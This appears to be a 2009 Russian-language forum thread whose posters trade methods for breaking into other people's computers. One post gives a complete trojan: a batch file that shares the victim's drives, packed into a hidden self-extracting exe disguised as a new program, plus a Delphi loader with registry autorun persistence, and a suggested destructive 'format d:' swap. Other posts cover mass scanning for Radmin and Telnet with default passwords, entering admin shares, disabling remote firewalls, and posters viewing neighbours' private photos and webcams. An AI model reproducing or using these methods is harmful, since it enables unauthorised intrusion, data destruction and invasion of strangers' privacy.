| QUOTE (berg25 @ 20.09.2009 - время: 19:00) | ||
а зачем тебе для поиска компов с радмином словарь????????? на вкладке portscan ищи, те что с логином не нужны, нужны только с пассом |
Словарь для Essential NetTools, а в сеткиуменя все с логинами
Представь ситуацию - злобный админ в локалке закрыл тебе доступ к своим дискам а тебе очень нужно незметно покапаться в его компе =) Сегодня я покажу тебе как легко решить эту проблему.
//ЧАСТЬ 1 - "крутая прога"//
Итак, ты пишешь bat файл следующего содержания:
@Echo off
net share disk_d=d: > nul
net share disk_c=c: > nul
Этим ты расшаришь диски C: и D: на компе админа.
Затем берешь мой любимый архиватор WINRAR и начинаешь колдовать =) :
1) Выбираешь метод сжатия - максимальный.
2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =)
3) Переходишь на вкладку "Дополнительно" - "Параметры SFX"
4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir%
5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки".
6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы".
7) На вкладке "Текст и значок" указываешь иконку будущего exe файла.
8) тыкаешь OK.
Итак, у тебя есть exe файл который ты можешь смело впаривать админу сетки под видом какой-нибудь новой проги =)
//ЧАСТЬ 2 - клиент//
Теперь напишим скрипт с помощью которого ты на своем компе будешь подключать сетевые диски админа =) Пишешь:
net use X: //имя компа админа/disk_d
net use Y: //имя компа админа/disk_c
И спокойно юзаешь его диски в свое удовольствие.
Чтобы замести следы (напимер при работе на компе общего доступа) используй:
net use X: /delete
net use Y: /delete
Есть одно препятствие: админ может увидеть посторонние расшаренные диски набрав команду net share в cmd.
Для большей надежности можно запускать это все таким образом:
1) Пишешь прогу (я пишу на delphi), запускающую твой батник.
2) Склеиваешь ее и батник описаным выше способом только в запуск после распаковки вместо батника прописываешь скомпиленый exe файл
Итак действуем.
1) Открываешь делфи и пишешь:
...
uses Windows, ShellAPI, Forms;
...
var
Form1: TForm1;
Reg : HKEY;
szPach: String ;
szName: String ;
y: string;
...
procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm:=false; //делаем наш загрузчик невидимым на панели задач и в диспетчере во вкладке "процессы" - ибо нех =)
begin
y:=ParamStr(0);
szName:='NTClock.exe'; //имя проги которое будет видно в редакторе реестра.
szPach:=y ;
//Создаешь ключ в реестре
RegCreateKey(HKEY_LOCAL_MACHINE, 'Software/Microsoft/Windows/CurrentVersion/Run', Reg);
//Создаешь параметр автозапуска
RegSetValueEx(Reg, PChar(szName) ,0 ,REG_SZ ,PChar(szPach), Length(szPach));
//Освобождаешь хендл
RegCloseKey(Reg);
begin
sleep(60000); // пауза в 1 мин (можно не делать)
ShellExecute(0, 'open', 'c:/WINDOWS/shara.bat', '', '', SW_HIDE); //запускаешь свой батник в скрытом режиме.
Application.Terminate; //закрываемся
end;
end;
end;
Как ты уже заметил я прописал наш загрузчик в реестр в раздел автозапуска. Теперь если даже админ и уберет расшареные диски, они у него будут расшариваться при каждом запуске системы =)
Здесь еще такая фича:
даже если админ пропалит автозапуск и полезет в реестр, то не всегда сможет понять где прописан злой процесс потому что не у каждого может вызвать сомнения прога под названием NTClock.exe =)
Также при желании можно заменить код батника на что нибудь вроде
@Echo off
format d: /q /y > nul
Все в твоих руках =)
Чуть не забыл, я поместил батник в папку windows т.к среднестатистический юзер там бывает редко. Поэтому при склеивании winrar'ом забей в путь %windir%
2)-Сканер портов (Или сканер безопасности)
-Телнет клиент (Он входит в стандартную комплектацию Windows-a)
-Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже)
Это всё самое необходимое.И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами:
-Через порт радмина (4899 порт)
-Телнет порт (23 порт)
Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них.
Начнём с радмина:
РАДМИН (Radmin):
Тут на хакзоне я видел видео по проникновению на чужой комп используя радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и простой способ ещё раз,так как этот способ входит в мою статью,и может кто не смотрел видео.
Радмин,порт которого 4899,используеться для удалённого администрирования,для того чтоб открыть порт радмина,на компе должен быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв с открытым 4899 портом.
Я для этого буду использовать сканер уязвимостей XSpider.
Запускаем XSpider,и создаём новый профиль (Профиль-Новый):
-В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке "NetBIOS",снимаем все галочки,переходим к следующей,Telnet,от туда тоже снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем галки,и не меняем никакие параметры) когда дошли до вкладки "Сканер Портов",останавлеваемся на этой вкладке,и видим там надпись в низу окна:
Файл портов: default.prf
Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в верху на запись "Новый",в ещё одном появившемся окошке жмём кнопку "Выбрать",В появившемся окне,в поле "Коментарий" давайте впишем 4899.В нижнее поле в том же окне с названием "Добавить прт[ы]:"
Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на "Сохранить как...",В поле "Имя файла" вписываем 4899,и жмём "Сохранить".Далее в появившемся списке профилев выбираем наш созданный "4899" и жмём "Выбрать".Далее в оставшемся окне насройки профиля,переходим к вкладке NetBIOS,и жмём там "Сохранить как...",пишим в поле "имя файла" 4899 и жмём "Сохранить".
Уффф...,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий) кликаем по нему один раз,и жмём выбрать.
Теперь когда профиль создан и выбран,нужно просканить определённый диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до 79.126.27.255
Жмём в Спайдере "Добавить диапазон",вписываем нужный,и жмём ОК,когда спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто допустим мы начали сканить диапазон
79.126.27.0 - 79.126.27.255.
Когда спайдер находит жертву с открытым 4899 портом тот айпи выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот просканив этот диапазон я один раз нашел уязвимый комп,это 19.126.27.202.
Теперь берём прогу Radmin Viewer (Не спутайте с Radmin Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899 портом,выбераем режим подключения,для удобства выберайте "File-transfer",и подключаемся,Если версия сервера радмина установленная на компе жертвы ниже 2.2,то попросит только пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если не подошел,то тогда придёться использовать брутер,но чаще всего стоит по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня есть,если кому надо,то стучите в асю,скину брутер.
Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким простым способом мы получили доступ к удалённому компу.
Тепеь давайте рассмотрим взлом через телнет.
3)TELNET
Искать компы с открытым 23 портом телнетом можно также как я описывал во взломе с радмином,только при настройке профиля,указываем 23 порт а не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил брутфорс.Подойдёт BrutusAET2.
Я тут описал только самый простой способ искать телнет порты и взламывать,может кто то использует и другой,но я описал как этим пользуюсь я.
Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп.
Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь трояном.Как это делать описывать не буду потомучто на хакзоне этого много.
Вот стелнэтом я не разобрался(
| QUOTE (komersant @ 20.09.2009 - время: 20:09) |
| Наконец-то получилось. Пол дня сидел, но троих все-таки нарыл через Radmin. BERGу 25 благодарствуем! Как плюсы ставить я не знаю, походу постов еще мало. Как разберусь- поставлю. |
Как гласит 352 заповедь Вуаериста разобрался сам помоги ближним =)
wconsnap обсолютно не поддаётся моей дресуре
| QUOTE (кат @ 20.09.2009 - время: 21:29) |
| Привет! Подскажите какая хорошая прога для того чтобы восстановить удаленные файлы (фото, видео) с любого фотика и компа???? |
Если полистать этот тред на две-три страницы назад, то там будет почти полный список:
Бесплатные PhotoRec и PCInspector File Recovery
Платные: RStudio, Zero Assumption Recovery
ну и ещё что-то есть, но этих в 99,5% случаев хватает.
| QUOTE (berg25 @ 21.09.2009 - время: 13:30) |
| когда находишь комп, кидай wconsnap на диск С, потом конектишься телнетом, и пишешь сначала что бы узнать есть ли камера или нет вот эту команду: ... |
Спасибо очень помог огромная благодарность
пароль root dreambox. Да еще он под линукс
| QUOTE (yra554 @ 23.09.2009 - время: 23:33) |
| Это тюнер спутниковый Dreambox у него сетевая встроеная пароль root dreambox. Да еще он под линукс |
Их в сети штук 5, интересно что можно хорошего с ним сделать?
а что за сканер телнета?
| QUOTE (orionkard @ 26.09.2009 - время: 19:11) |
| а ко знает прогу удаленого администрирования, чтоб работала без реальных IP через нет и запускалась автоматом свернутая к часам или вообще не показывала значек типа TeamViewer но чтоб не выскакивало разных сообщений при подключении,желательно с русификацией. установка сервеной части не проблема |
Раз "без реальных IP" -то в любом случае нужен "внешний" сервер в реальным IP, через который сервер и клиент будут соединяться. И у ТимВьювер и Хамачи такие сервера есть. Если нужно "без вопросов", "без значка" - вполне подойдёт UltraVNC - он умеет работать полностью заNATченым - когда и клиент и сервер не имеют реальных IP. Для соедиения нужен компьютер с реальным IP и VNC repeater на нём. Одна-единственная проблема - соедиение должны устанавливать И клиент, И сервер - т.е. что-то должно "пнуть" сервер, чтобы он полез до repeater-а... Хотя, наверное, можно на шедулу повесить - чтобы раз в час пытался подключиться и по мере необходимости его ловить клиентом на том же repeater-е.
И ещё - русской версии нет.
2 andranik234:
А какие проблемы-то?!?!? По IP и маске своего компьютера определить используемую подсеть. На основе этих данных просканировать сетку чем-нибудь типа
http://www.radmin.ru/products/utilities/lanscanner.php
если открыты порты: 137..139 и 445 - значит смело заходишь на данный компьютер примерно так:
\\IP_компьютера\C$
Какие "неприятности" могут ожидать - включен файервол на "целевой" машине - если туда разрешён RPC, то правый клик на "мой компьютер"-"управление"-правый клик на "Управление компьютером" - "подключиться к..." - указываешь найденый IP -если подключится - гасишь файервол.
Ещё могут быть отключены административные шары (которые с $ на конце) - точно также идёшь через Управление компьютером на "целевой" комп - сначала в Управление дисками - смотришь какие буквы дисков есть - потом идёшь Общие папки - общие ресурсы - создать - чтобы не палиться - называешь, "БУКВАДИСКА$" что шарить - "БУКВАДИСКА:\" после чего на свежесозданную шару можно попробовать зайти по сети.
Ещё одна тонкость - заходишь в папочку Recent активного пользователя на "целевом" компьютере и смотришь - что в последнее время от открывал - часто видно что-нибудь типа "Съёмный диск (Е)" - типа человек подключил свою флэшку. Идёшь в управление дисками на том компьютере (см. выше) и проверяшь - подключена ли всё ещё флэшка - если подключена - расшариваешь её, как же описано выше.
| QUOTE (prozector @ 26.09.2009 - время: 19:57) |
| Раз "без реальных IP" -то в любом случае нужен "внешний" сервер в реальным IP, через который сервер и клиент будут соединяться. И у ТимВьювер и Хамачи такие сервера есть. Если нужно "без вопросов", "без значка" - вполне подойдёт UltraVNC - он умеет работать полностью заNATченым - когда и клиент и сервер не имеют реальных IP. Для соедиения нужен компьютер с реальным IP и VNC repeater на нём. Одна-единственная проблема - соедиение должны устанавливать И клиент, И сервер - т.е. что-то должно "пнуть" сервер, чтобы он полез до repeater-а... Хотя, наверное, можно на шедулу повесить - чтобы раз в час пытался подключиться и по мере необходимости его ловить клиентом на том же repeater-е. И ещё - русской версии нет. |
хамач с radmin полностью бы устроили, но у хамача нету автозапуска, а если через авторан то всеравно не сворачиваеться в трей а остаеться окно с сетями. если б как нибудь заставить хамач сворачиваться в трей после запуска.
| QUOTE (orionkard @ 26.09.2009 - время: 23:38) |
| хамач сворачиваться в трей после запуска. |
Прятать окна:
http://www.commandline.co.uk/cmdow/
проблема - многие антивири считают cmdow опасной прилой и алертят почём зря. Надо добавлять в исключения.
| QUOTE (prozector @ 27.09.2009 - время: 00:00) | ||
Прятать окна: http://www.commandline.co.uk/cmdow/ проблема - многие антивири считают cmdow опасной прилой и алертят почём зря. Надо добавлять в исключения. |
как сие чудо работает интересно
можно пошагово и с помощью каких программ..? Как для совсем ничего не понимающего. Что и куда вставлять?
Хоть и в этой теме было уже написано,но у меня не выходит-т.к. много не знаю.
Есть большая локалка,а открыто очень и очень мало....
| QUOTE (andranik234 @ 27.09.2009 - время: 14:28) |
| И еще интересно лазя по целевому компьютеру можно спалитца, если за ним работают? |
Да. Легко - при выключении компьютера или при отключении сменного носителя, на котором ты "висишь" у "жертвы" будет алерт, о том, что "пользователь такой-то открыл столько-то файлов и если вы продолжите - эти файлы станут для него недоступными".
Ещё - если усиленно копировать с "целевого" компьютера файлики - усиленно мигает лампочка HDD, прилы начинают медленно запускаться, а если компьютер не особо шутсрый - так он вообще тупить начинает. Поэтому лучше для копирования использовать что-нибудь типа KillCopy - там можно задавать скорость копирования.
Подробно изучил прогу LanScope...в самом начале, попал к соседке на комп...целый диск Е был расшарен, посмотрел интересные фотки...ну там ДР мамы, ДР бабушки(пару упсов бабушки)...ну и всё!)
В общем, просканировал ВСЮ сетку(куча времени потрачено)...все заблочено(ну было парочка общих документов...музыки там всякой...видимо сами расшаривали для обмена), кучи заблоченых дисков(типа нид login и password)...НУ ВОТ И ВСЕ, "УПЕРЛИСЬ В ДНО!"
Очень хочется попасть на что-нибудь интересное, мож кто поможет!?)
Попадались диски С, знаю, что как то можно что-то сделать...и попасть на КОМП...но не знаю как!!!(((
Кстати, wconsnap делает только отдельные кадры? Видео никак?
P.S. Просканировал диапазоны трех московских провайдеров: Акадо, МГТС(Стрим) и Корбину(еще не до конца) - с радмином меньше 1% компов. Из них - с паролем по умолчанию также около 1%. С камерой попался всего 1 компьютер (ничего интересного).
Но тем не менее, интересно и просто полазить по папкам, хотя чего-то стоящего тоже практически нет.
Самое интересное из найденного - видео с мобильника:
Это сообщение отредактировал diabolic - 30-09-2009 - 21:57
Crack искал...быстро найти не удалось, не у кого не завалялся случайно?!)))